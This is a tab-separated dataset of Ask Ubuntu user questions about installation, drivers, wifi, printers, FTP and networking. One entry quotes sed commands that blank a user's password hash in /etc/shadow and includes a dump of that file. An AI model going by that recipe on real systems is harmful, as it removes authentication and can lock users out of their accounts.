521860	does n't not show installed matlab !	i have installed matlab on ubuntu 14.04 and when i type matlab the installation does n't come up . it is even not showing in the ubuntu software center . but i could perfectly run matlab using the command prompt .
521863	enabling root privileges permanently and have no password	i want to enable root privileges permanently so that , for example , i never need to type sudo . i also want a blank password . i found a thread addressing this with link always sudo privileges . exactly what i want to do is summarized as follows . run the commands below , and compare the outputs sudo cat /etc/shadow sudo sed `` s/\ ( ^ $ ( whoami ) : \ ) [ ^ : ] */\1/ '' /etc/shadow you should see that the latter has removed the gibberish in front of your username ( which is read using $ ( whoami ) ) . ( if you do n't , do n't continue ! ) when you 're ready , run the command to overwrite /etc/shadow ( at your own risk ! ) sudo sed `` s/\ ( ^ $ ( whoami ) : \ ) [ ^ : ] */\1/ '' /etc/shadow > /etc/shadow your account now has a blank password , and you should no longer be prompted for sudo permissions . ( at least , that 's what happened to me . ) the problem is that i get a permission denied on the command that actually changes /etc/shadow . changing ownership of the file first allows the command to execute , but then i do not seem to have a blank password . if i log out , i ca n't get back in , neither blank nor my original password are accepted . please help me understand why these directions are not working for me . i have seen several questions like this in trying to resolve my issue , and they often devolve into a lecture on why some feel this is a bad idea . please just help me figure this out without this thread going there . without knowing my specific situation , no one on this thread can know that this is a bad idea . this is what happened in my terminal in accordance with the answer below : kyle @ mp : ~ $ sudo sed -i.bak `` s/\ ( ^ $ ( whoami ) : \ ) [ ^ : ] */\1/ '' /etc/shadow kyle @ mp : ~ $ sudo cat /etc/shadow root : ! :16322:0:99999:7 : : : daemon : *:16177:0:99999:7 : : : bin : *:16177:0:99999:7 : : : sys : *:16177:0:99999:7 : : : sync : *:16177:0:99999:7 : : : games : *:16177:0:99999:7 : : : man : *:16177:0:99999:7 : : : lp : *:16177:0:99999:7 : : : mail : *:16177:0:99999:7 : : : news : *:16177:0:99999:7 : : : uucp : *:16177:0:99999:7 : : : proxy : *:16177:0:99999:7 : : : www-data : *:16177:0:99999:7 : : : backup : *:16177:0:99999:7 : : : list : *:16177:0:99999:7 : : : irc : *:16177:0:99999:7 : : : gnats : *:16177:0:99999:7 : : : nobody : *:16177:0:99999:7 : : : libuuid : ! :16177:0:99999:7 : : : syslog : *:16177:0:99999:7 : : : messagebus : *:16177:0:99999:7 : : : usbmux : *:16177:0:99999:7 : : : dnsmasq : *:16177:0:99999:7 : : : avahi-autoipd : *:16177:0:99999:7 : : : kernoops : *:16177:0:99999:7 : : : rtkit : *:16177:0:99999:7 : : : saned : *:16177:0:99999:7 : : : whoopsie : *:16177:0:99999:7 : : : speech-dispatcher : ! :16177:0:99999:7 : : : avahi : *:16177:0:99999:7 : : : lightdm : *:16177:0:99999:7 : : : colord : *:16177:0:99999:7 : : : hplip : *:16177:0:99999:7 : : : pulse : *:16177:0:99999:7 : : : kyle : :16322:0:99999:7 : : : kyle @ mp : ~ $
521864	ubuntu server maas - node commission failure	im currently taking on a project for my first year bcs majoring in information technology . for this i have been tasked to setup a small 10 node cloud and explore the feasibility of small scale cloud computing infrastructures for businesses . the issue im having is that my node im trying to commission fails . the official documentation is vague and does not offer much insight on what the problem could be . being my first year and all im not familiar with the technical side of things but i do understand what im doing to an extent . background info : im in a vlan that is isolated from the uni network . within this vlan ive isolated myself into a lan with a cluster/region controller connected to a 24 port switch . server runs dhcp and dns for me . because in this vlan is another dhcp and dns server issuing ip address and offering name resolution i can be connected to it while im commissioning nodes . to avoid messing up the vlan i downloaded all the require boot images before setting up dhcp and dns . now i start running into errors when i switch my node on to be commissioned . https : //www.dropbox.com/sh/s6zypape9v51s58/aabx9l9qgejrfava1angxdcwa ? dl=0 here are screen shots of the errors i get . this happens straight after the server tries commissioning a node .
521868	firefox sound not available	i was using oxford online dictionary . when i clicked the prunuciation button , a message popped up saying `` apologies , the sound is not available . '' here is a screenshot . larger image : https : //i.imgur.com/ugslqkm.png i have tested this on another browser ( chromium ) and did not have this problem . how do i get it to play in firefox ?
521869	force thunderbird open attachments read-only	i asked help already in mozilla forums : [ ... ] it seems , that since the update to v31 thunderbird does not open attachments as read-only ( at least on my installs ) and you can edit and save attachments ( in my case libreoffice documents into the /tmp directory ) . unsurprisingly - after restart i have lost a days work now . and got the following answer : as far as i can recall , that functionality has not changed , at least not in the windows version of thunderbird . tb has always opened messages in the temp directory using the associated `` helper program . '' whether that file was opened in read-only mode or not would seem to be up to that external program or the os . it seems that ubuntu ( 14.04 ) handles this somehow differently . what should i do to restore the previous behaviour , i.e . force thunderbird to open attachments as read-only ? mozillazine : read-only attachments ( linux )
521872	what to do when reinstalling ubuntu when /home on a seperate hdd ?	one of the reasons i believe that having /home on a separate hard drive was that it would be easier to maintain you 're data if you need to do a re-install . my question though is it as simple as just running a new install on the os hard drive or do you need to do certain steps ( apart from a back-up ) before re-installing ubuntu ? for example do you need to use same username/computername and passwords ? in my case ubuntu 14.04 is the only os used and i have encrypted the os but not /home .
521874	login in ubuntu 12.04 lts , but return to same window	i am using ubuntu 12.04 lts . when i type password in the ubuntu log-in window . it returns to the same window . i have tried a lot of solution in internet . but no use .
521875	is there something with my apt sources list ?	is it me or are packages in the depository like too frustratingly out of date to be of any use , in particular for development work ... . are there any problems with my sources list ? before i banish the use of apt altogether ... . # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse # added by software-properties deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security restricted main multiverse universe # added by software-properties deb http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ precise partner deb-src http : //archive.canonical.com/ precise partner deb-src http : //extras.ubuntu.com/ubuntu precise main
521876	windows installation along with ubuntu 14.04 for asus	i have a laptop of asus k55a model . i was using windows 8.1 but someday ago a problem happened and i was unable to install windows 8.1 ( i did n't tried other ) . then i tried ubuntu 14.04 and could install it . now i want to install windows alongside this ubuntu 14.04 . is there any way ? if yes , what 's that ?
521878	ubuntu 14.04 lts wifi hardware disabled	i 've just installed ubuntu 14.04 lts on my hp envy spectre xt 13-2000eg and i just ca n't get my wifi working . i have an intel centrino advanced-n 6205 i also have the gnome shell installed ( i do n't think thats the problem ) when i try to connect to a wifi network it says hardware disabled . when i run rfkill list i get 0 : phy0 : wireless lan soft blocked : no hard blocked : yes further i already checked , but i do n't have a hardware switch for wireless connections . simply trying rfkill unblock all wo n't do the trick either . funny thing is that for a short time the wifi worked but after the reboot i had the same problem again . maybe it is intel 's iwlwifi ? i could n't figure out how to install that : / i really hope someone can help me .
521881	shared library error	i am trying to install the `` libh3dapi '' . when i run the `` cmake . '' command in the build folder of h3dapi is runs fine . but when i try to run `` make '' , it runs for sometime and gives the following error at the end . /usr/bin/ld : /usr/local/lib/libpython2.7.a ( boolobject.o ) : relocation r_x86_64_32 against '.data ' can not be used when making a shared object ; recompile with -fpic /usr/local/lib/libpython2.7.a : could not read symboles : bad value collect2 : ld returned 1 exit status make [ 2 ] : *** [ libh3dapi.so.2.2.1 ] error 1 make [ 1 ] : *** [ cmakefiles/h3dapi.dir/all ] error 2 make : *** [ all ] error 2 . i am using ubuntu 12.04 debian precise . please help . thanks
521887	maximized window has free space on bottom	im trying to run streams of warcraft 3 on ubuntu 14.04 . everething is good . but it have to be windowed mode for working stream correctly . im running it with command env wineprefix= '' /home/a6y/.playonlinux/wineprefix/warcraftiii '' wine `` c : \program files\warcraft iii\frozen throne.exe '' `` -opengl '' -windowed -w 1024 -h 768 and full screen it with compiz manager titel= $ warcraft iii^ link for printscreen : https : //docs.google.com/a/xakep.ru/file/d/0b3hug1xeysjvls1hnva2s0jyd00/edit but i have free space on bottom of my creen . how could i solve this problem ? !
521888	crash , followed by i/0 error	i 'm looking for help diagnosing an issue i 'm having with ubuntu 14.04 64bit . i 'm a relative newbie to all this , so i 'm not really sure where to start . basically what happens is this : computer boots up as normal computer runs fine for a certain amount of time ( normally an hour or so ) , whilst i work & browse the net . normally chrome ( version 39.0.2138.3 dev ( 64-bit ) will crash , and all my other applications will freeze . this lasts about 30 seconds , then chrome will close and the other applications will be responsive again . p.s the fact it 's normally google chrome is probably irrelevant - i have had this happen without opening chrome at all . other than using the applications i already have open , i ca n't do anything else . i ca n't open a new application ( even using keyboard shortcuts ) , i ca n't close old ones , and i ca n't shut my computer down ( the top right menu does n't open and i ca n't get to terminal ) . what i have attempted investigating with the virtual terminal during the crash , i 've tried to open a virtual terminal ( ctrl-alt-f2 ) , but when i try to log in , i get the error : [ 4210.959605 ] end_request : i/o error , dev sda , sector 5373856 gsmartcontrol disk scans on both sdd and hdd having seen the above , i thought my ssd ( sda ) must be failing , so i downloaded and ran gsmartcontrol and did the extended test on both my ssd and my hdd , and got no problems reported . memtest ( thanks @ rinzwind ) so far i 've only had this running for 1.5 hours , which was enough to complete two test suites successfully with no failures . edit : completed 9 hours last night with no errors . i am not sure where to go from here though , are there some logs i can look into ? are my hard drives definitely okay if gsmartcontrol tells me they are ? thoughts & help much appreciated .
521889	problem during compilation	i am learning how to compile using your compilingeasyhowto guide . but as soon as i run the command shown below in the terminal , it shows the following error : tejas @ tejas-au909aa-acj-cq3120ix : ~ $ sudo chown $ tejas /usr/local/src chown : missing operand after ‘/usr/local/src’ any idea how to overcome this problem ?
521890	sharing installing ubuntu with an ntfs data partition	will i be allowed to install ubuntu on to a 1.5gig hdd of which half of the drive is dedicated to an ntfs data partition , no os is installed . thank you .
521891	installing a linux-i686.tar.gz2 file in ubuntu	i have downloaded a file named `` kiwix-0.9-rc2-linux-i686.tar.bz2 '' . but i do n't know how to install these types of file in ubuntu 14.04 .
521892	installing ubuntu 14.04.1 lts	after rebooting and choose to boot from dvd that contain ubuntu iso . then the ubuntu logo appear and when total black and nothing happen . is there any solution for this problem ? i wanted to make dual boot and currently using windows 8.1 .
521893	is it possible to install ubuntu on usb ?	i 'm not talking about extracting the ubuntu iso into a usb and running it . i want to install it on a usb lets say 16 gb . i 've heard its not possible but not seen any answers on google .
521899	recover hard drive space without uninstalling ubuntu	recover hard drive space i had ubuntu installed in a drive space of 200 gb now i want to use 150 gb of the space and keep ubuntu installed on 50 gb.how to do it ?
521900	fsck tool for udf filesysyem in 14.04	is any tool to make fsck check udf file system on portable hard drive ? i have udftools package installed but no any tool to check udf filesystem in it . thanks
521906	incorrect gmt time	my clock shows wrong time for gmt ! my local time is correct ( tehran , iran = gmt +3:30 ) , but as it 's clear from the above screenshot , gmt ( greenwich ) is 1 hour behind according to google ! the utc and pacific times are correct ( checked with google ) . note that `` time & date '' settings are set to `` automatically from the internet '' . any ideas to fix this ?
521907	communicate from ubuntu 12.04 to ubuntu 12.04 ?	i have two laptops running ubuntu 12.04 on which i want to build a ( virtual ) network using vmware workstation . the first step is to communicate between the hosts by using an crossover cable . i have set the nicâ´s on the same netwerksegment as following : 192.168.1.1 192.168.1.2 do i have to set an route-definition ? and how can i do this , so they refer to each other and i can ping ?
521908	installation issue in old laptop	i am trying to install latest ubuntu ( 32-bit ) on y old laptop - ibm thinkpad , winxp , pentium m , 512mb ram . since i do not neet the windows os , though i can install ubuntu only . have ubuntu 32-bit on liveusb when system boots thru ' usb , could see 2 icons at the bottom after that , getting an error that pae is not supported and some ( error message below ) '' this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . '' please help / suggest options on how i can get this installed .
521909	installing ubuntu on benq joybook a52e ( 7 yo laptop )	so here is my problem . i am trying to install ubuntu from usb ( cd drive is dead ) on benq joybook a52e laptop . but the problem is that usb drive larger than 256mb can not be recognized as bootable device , or i just do n't know how to set it up . here is a list of boot options in bios : hdd usb key usb fdd network so when i plug 256 mb transcend 120mb jetflash 110 usb 2.0 thumb drive it is seen in bios , but i ca n't make bootable 14.01 installation version on that . and the usb 's i have are 4gb and 16gb that are not recognized in bios ( i have no idea why , maybe because it is old laptop ? ) . i have tried to make a smaller partition in partitioning software , and it did not work . i have also tried different partition formats ( fat , fat32 ) also did n't work . so can someone help me how to install it properly , and yes i would like 12.xx or later version of ubuntu on that machine .
521912	brother dcp-7055 scanner : where do i get vendor/product id and then where do i put them ?	now after updating from 13.10 to ubuntu 14.04 , my brother dcp-7055 still prints , but still does not scan . i 've reinstalled the brother drivers . twice . ( i 'm now using 0.4.2-3 ) lsusb says : bus 003 device 011 : id 04f9:0248 brother industries , ltd dcp-7055 scanner/printer whereas scanimage -l says device `brother4 : bus2 ; dev1 ' is a brother dcp-7055 usb scanner so i tried ( as root ) : ln -s /dev/bus/usb/003/011 /dev/usb/scanner so , now instead of `` failed to open '' sane-find-scanner -v gives me : ... searching for usb scanners : checking /dev/usb/scanner ... open ok , but vendor and product could not be identified found usb scanner ( unknown vendor and product ) at device /dev/usb/scanner ... . # your usb scanner was detected . it may or may not be supported by # sane . try scanimage -l and read the backend 's manpage . # `unknown vendor and product ' means that there seems to be a scanner at this # device file but the vendor and product ids could n't be identified . # currently identification only works with linux versions > = 2.4.8 . you may # need to configure your backend manually , see the backend 's manpage . i feel i might have taken an important step forward , but i do n't know what to do next ? is there a command to find out the product/device id ? and , if/when i find that , i guess there is a configuration file somewhere where i stick it ? update duh ! i just noticed lsusb was giving me vendor id ( 04f9 ) and product id ( 0248 ) . but i still do n't know where to stick them . thanks !
521914	lost power during my upgrade , how do i recover ?	i was upgrading my 12.04 to 14.04 . during the install step , i accidentally lost power to my laptop ( sockets did n't work ) and got shutdown.when i tried to start my ubuntu , till login password it is coming afterwards it is a plain display , nothing is coming and files are not loading . how i can recover my ubuntu , is there any way to solve this ?
521915	mouse and video freezes . fixed by ctrl-alt-f6 and then ctrl-alt-f7	every hour or so the mouse and video freezes . i do ctrl-alt-f6 and then ctrl-alt-f7 and then it works again . what is wrong ? and how can i stop the mouse from freezing ?
521919	making a bash script executable programatically	i need to create a bash script to create and mount a drive . so , two simple commands . both `` work '' when entered at the command line . the script is created and executed every time a normal user logs in , so i need a method to make this script executable at that time . so far , i can not get this to work . for example , the first part `` mkdir /vvv/gggg '' does n't proceed because the script is not executable ( i 'm guessing ) . hope this makes sense . is this possible ? any thoughts on how to make this work will be appreciated . update : thanks for your responses . i probably should add some additional information other than that i 'm new to linux . i 'm using an open source virtual desktop application called ulteo . this app runs on top of ubuntu and has very little support - that why i 'm here . basically , i 'm learning by fire . so , there application has a login script management function where i can tie a script to a user . a simple windows script with net use works perfectly fine . however , when i try to apply a linux bash script nothing happens . i 'm thinking that because i need to perform a chmod +x against the script first to make the script executable , this is why its failing . by the way , ulteo runs in a chroot jail . i 've created a script , saved it and could not find the script . i searched both inside and outside the chroot jail . i like the approach by dan08 to have the initial script reference another script that i can find and make executable manually . would i run into the same problem ? does this additional information clarify the situation ? thanks in advance . photos attached . ! [ login scipt management console ] [ 1 ] ! [ windows scripts that work ] [ 2 ] ! [ simple linux script that does n't work ] [ 3 ] sorry i ca n't post images yet
521920	how do i install ubuntu on a usb flash drive ?	my laptop does not have enough space to install ubuntu and i need to install it on a usb flash drive . how do i install it ?
521921	fglrx stopped working after an update	after an update last week my ati proprietary driver i.e . fglrx stopped working . which means i had to go into recovery and remove fglrx fglrx-pxpress fglrx-amdcccle . i reinstalled fglrx successfully but it says it does not detect any graphics card note : i have ati radeon 7670m graphics on my laptop
521922	ftp login incorrect	i´ve installed the vsftpd on my ubuntu 14.04 . my vsftpd.conf : listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes chroot_local_user=yes secure_chroot_dir=/var/run/vsftpd/empty rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key i wan na connect with my normal shell login user . i type the same username and password.i use the client-program filezilla . look at that error : user jason answer : 331 please specify the password . command : pass ******** answer : 530 login incorrect . what can i do . i´m relly sure that i´ve typed the right password . i can connect via sftp , but not via normal ftp . thx for your answers . best regards ! ; )
521924	14.04 wifi seems to randomly work with	i have recently added a wireless card to my desktop . it is a atheros ar9227 and occasionally works perfectly . the problem is sometimes when i boot up there seems it seems like the wireless card is not working . when this happens i can still see the card in lspci . the only thing that fixes it is a random number of reboots sometimes 1 sometimes 5 . i am lost and any help would be appreciated . lspci > 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( external gfx0 port b ) ( rev 02 ) 00:02.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( pci express gpp port b ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:15.1 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 1 ) 00:15.2 pci bridge : advanced micro devices , inc. [ amd/ati ] sb900 pci to pci bridge ( pcie port 2 ) 00:16.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 10h processor link control 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) 01:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) 02:06.0 network controller : qualcomm atheros ar9227 wireless network adapter ( rev 01 ) 04:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 )
521928	when trying to upgrade to ubuntu 14.04 , libc6 breaks , why and how to solve this problem ?	$ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libkms1 libreoffice-java-common openjdk-7-jre-lib use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libc-bin libc6 suggested packages : glibc-doc the following packages will be upgraded : libc-bin libc6 2 upgraded , 0 newly installed , 0 to remove and 2692 not upgraded . 58 not fully installed or removed . need to get 0 b/5,906 kb of archives . after this operation , 30.7 kb of additional disk space will be used . do you want to continue [ y/n ] ? \preconfiguring packages ... ( reading database ... 527325 files and directories currently installed . ) preparing to unpack ... /libc6_2.19-0ubuntu6.3_amd64.deb ... checking for services that may need to be restarted ... checking init scripts ... checking for services that may need to be restarted ... checking init scripts ... ┌──────────────────────────────┤ configuring libc6 ├──────────────────────────────┐ │ │ │ running services and programs that are using nss need to be restarted , │ │ otherwise they might not be able to do lookup or authentication any more . the │ │ installation process is able to restart some services ( such as ssh or │ │ telnetd ) , but other programs can not be restarted automatically . one such │ │ program that needs manual stopping and restart after the glibc upgrade by │ │ yourself is xdm - because automatic restart might disconnect your active x11 │ │ sessions . │ │ │ │ this script detected the following installed services which must be stopped │ │ before the upgrade : kdm │ │ │ │ if you want to interrupt the upgrade now and continue later , please answer no │ │ to the question below . │ │ │ │ do you want to upgrade glibc now ? │ │ │ │ < yes > < no > │ │ │ └─────────────────────────────────────────────────────────────────────────────────┘ stopping some services possibly affected by the upgrade ( will be restarted later ) : cron : stopping ... done . unpacking libc6 : amd64 ( 2.19-0ubuntu6.3 ) over ( 2.17-93ubuntu4 ) ... dpkg : warning : subprocess old post-removal script was killed by signal ( segmentation fault ) , core dumped dpkg : trying script from the new package instead ... dpkg : error processing archive /var/cache/apt/archives/libc6_2.19-0ubuntu6.3_amd64.deb ( -- unpack ) : subprocess new post-removal script was killed by signal ( segmentation fault ) , core dumped no apport report written because maxreports has already been reached dpkg : error while cleaning up : subprocess installed pre-installation script was killed by signal ( segmentation fault ) , core dumped errors were encountered while processing : /var/cache/apt/archives/libc6_2.19-0ubuntu6.3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i do n't quite understand what 's the meaning of those output lines and how does they come . could you give a brief explanation of those lines and how to solve this problem ? ( i pressed yes when the dialog appears )
521929	sourcing a file	i am using ros ( robot operating system www.ros.org ) . i have to source .sh file every time . what it means ? source /opt/ros//setup.bash or have to enter this line in .bashrc file why we need this ?
521934	fonts in browsers seem to be rendered differently than in the rest of kubuntu	a simple question really ... i have kubuntu 14.04 installed . the fonts in google chrome , chromium , and firefox look significantly different than in the rest of the system . why ? i do like how the rest of the fonts are being rendered . can i get the fonts in my browsers look like the rest ? here a screenshot that would explain it . on the left , it is a newer version of chrome . and on the right an older one which i definitely prefer . the fonts are sleek and sharp :
521935	setting up loopback to function when ethernet disconnected	i 'm currently running a fresh install of 14.04 . `` ifconfig -a '' lists the loopback address , however i can not access the loopback interface ( i.e. , pass packets across it ) unless a networking cable is plugged in . as soon as ubuntu recognizes that a cable has been disconnected ( from either eth0 or eth1 ) , i am no longer able to pass packets via loopback . is there anyway i can configure the kernel to always allow the loopback address to pass data regardless of what is happening with the physical ethernet connection ? thanks in advance for the help . edited to add : confirmed that the application is using tcp and the loopback address ( 127.0.0.1 ) . however , packets will only go through if a networking devices is active . otherwise , i can still ping loopback , but the packets do n't go through . going to contact the vendor of the application with this information .
521937	write function in one line into ~/.bashrc	why when i try to wite a function just in one line into .bashrc file , list ( ) { ls -a } i get error ? bash : /home/kasiya/.bashrc : line num : syntax error : unexpected end of file but when i write it in multi line it 's ok ? list ( ) { ls -a }
521938	freeze after login	i have a problem with my hp g62 , after i changed the drivers , with additional driver . now when i login the pc go freeze .
521939	encryptr on ubuntu	i try to run encryptr [ 1 ] on ubuntu - i am getting this error : /usr/bin/encryptr : error while loading shared libraries : libxrender.so.1 : can not open shared object file : no such file or directory but i installed libxrenderer1 and libxrenderer-dev [ 1 ] https : //encryptr.org/
521940	how to configure postfix , stunnel for aws ses ?	i have been trying to set up ses on our ec2 running ubuntu . i have followed the instructions on their docs page but not able to figure out what 's wrong . i 'm a newbie that 's why i 'm looking for a little help from someone expert on this area . im setting up a secure tunnel to connect to ses and send emails from my php application which is located in a unubtu ( ec2 ) server using postfix . i had to create the stunnel.pem because it didnâ´t exist when i installed stunnel4 . this is the configuration in stunnel.conf : smtp-tls-wrapper accept = 2525 client = yes connect = email-smtp.us-east-1.amazonaws.com:465 cert = /etc/stunnel/mail.pem then i write this command line : stunnel /etc/stunnel/stunnel.conf then , i write this by console : telnet localhost 2525 and i get this : trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused log related to this in /var/log/mail.log status=deferred ( connect to 127.0.0.1http : //127.0.0.1:2525 : connection refused )
521945	why networkmanager 0.9.8 required , found ?	i can connect to the internet after plugin the cable , this error keeps going . how to fix it ?
521946	how i can change the icons on the toolbar nemo_1.8.4 : back , forward and path ?	how i can change the symbolic icons of the toolbar nemo_1.8.4_ : back , forward and path . i have tried without success , including from the source package . my distribution is ubuntu-gnome 14.04 lts . toolbar image 890x139px
521948	how do i fully install ubuntu on a usb flash drive ?	i need to install ubuntu on a flash drive because i do n't have enough space on my laptop to dual-boot . i need to fully install ubuntu on a flash drive .
521949	bypassing network manager	assuming there is more than one ethernet nic as well as a wireless device on a given system , how can i specify custom settings in /etc/network/interface for one of the nics but allow network manager to manage the others ?
521952	error : the system is running in low-graphics mode	i have this error : `` the system is runnin in low-graphics mode '' , and i got it when i used root account to move a .ttf file to /usr/share/fonts/truetype . after that i get this error and i watched and did almost everything from this link : how to fix `` the system is running in low-graphics mode '' error ? , also this one the system is running in low-graphics mode error in `` virtualbox '' . this was what i did and now i do n't know what to do . i think it has to do something with the root account i used to move some files . if someone can help i will be really grateful .
521953	redirecting multiple ports with socat	i would like to use socat to redirect some ports and i found a socat daemon here . however this daemon lacks documentation and i could only setup for one port redirect . is there any syntax to make socat or this daemon ( or another daemon ) to setup multiple individual ports redirecting ? edit 1 : a possible solution found here .
521956	how to install ubuntu from windows hdd ( not dual boot ) without cd , usb or network ?	since somehow i ca n't manage to install ubuntu from cd ( it is broken ) ca n't install from usb ( wont boot from usb drive larger than 256mb nor will unetbootin work from that usb ) , and i do n't have the skills to install from pxe ( network install ) . so is there a way to install ( clean install not a dual boot ) ubuntu from windows hard drive ? p.s . i might be there is some option in unebootin to `` install on hard drive '' but i am not sure will that remove windows from my hdd ?
521959	unable to find expected entry 'main/source/sources ' in release file	i have few packages on my remote server . i have packages for both precise and trusty . well , since apt repo of precise does not have ruby-2.0.0 , i had to manually put it up . i use aptly and publish the repos . my trusty repo works just fine , but my precise does not work . if i sudo apt-get update , i get unable to find expected entry 'main/source/sources ' in release file ( wrong sources.list entry or malformed file ) i check the release file for both of my versions , precise and for trusty , under md5 , main/binary-amd64/release file is missing . so basically , this new ruby-2.0.0.deb is creating this issue . how to solve this ? i need a release entry in my release file so that if i update , it will not show an error .
521962	ssh login on virtual server fails : account expired , ldap authorization failed	i have a user account on a virtual server , running ubuntu 10.04.4 lts . when i try to login via ssh i get an error message : $ ssh myuser @ myserver myuser @ myserver 's password : your account has expired ; please contact your system administrator ldap authorization failed i do have the root password and as root i tried resetting myuser 's password and also unblocking the account with passwd -u myuser , but that did not change the situation . ( i am not the server admin and i am not familiar with its setup . however i would like not to bother my boss with this matter . ) i remember that on one occasion when trying to login as myuser i entered the wrong password three times in a row . though i am not sure if that is the cause of the problem . the virtual server is provided by a web hosting service . my search efforts on stackexchange and google did not turn up anything helpful . how can restore my user account ?
521964	desktop environment no showing	first , i am not a pro in linux in any means so i may not understand what you guys suggest . so today i was using ubuntu as usual and all of a sudden the log out dialog appeared then after some lagging the launcher the status bar , everything but the opened windows disappeared . i restarted the computer and i ca n't even get to the login screen anymore . i tried most if not all of the methods suggested online but still no luck . ( i 'm running ubuntu 14.04 ) any suggestions would be greatly appreciated : d edit : when i use the command startx unity , i can see a black screen with a cursor but after a few seconds it will pop back to the command line screen outputting `` warning : locale not supported by xlib , locale set to c xinit : connection to x server lost '' followed by the x server terminated message
521965	usb ports not working with ubuntu linux 14 on windows 8.1	i currently have my system setup for dual boot with windows 8.1 and ubuntu linux . all of my usb ports work perfectly fine in windows , but my usb 2.0 ports do not work in the ubuntu linux os . i have a similar post to this on the unix/linux exchange but am not getting much progress there so i figured i would post here and hope for the best . any help is appreciated ! below is a link to my other post which contains all the outputs from lsusb , etc . http : //unix.stackexchange.com/questions/154041/usb-ports-not-working-with-ubuntu-linux-14/154581 # 154581
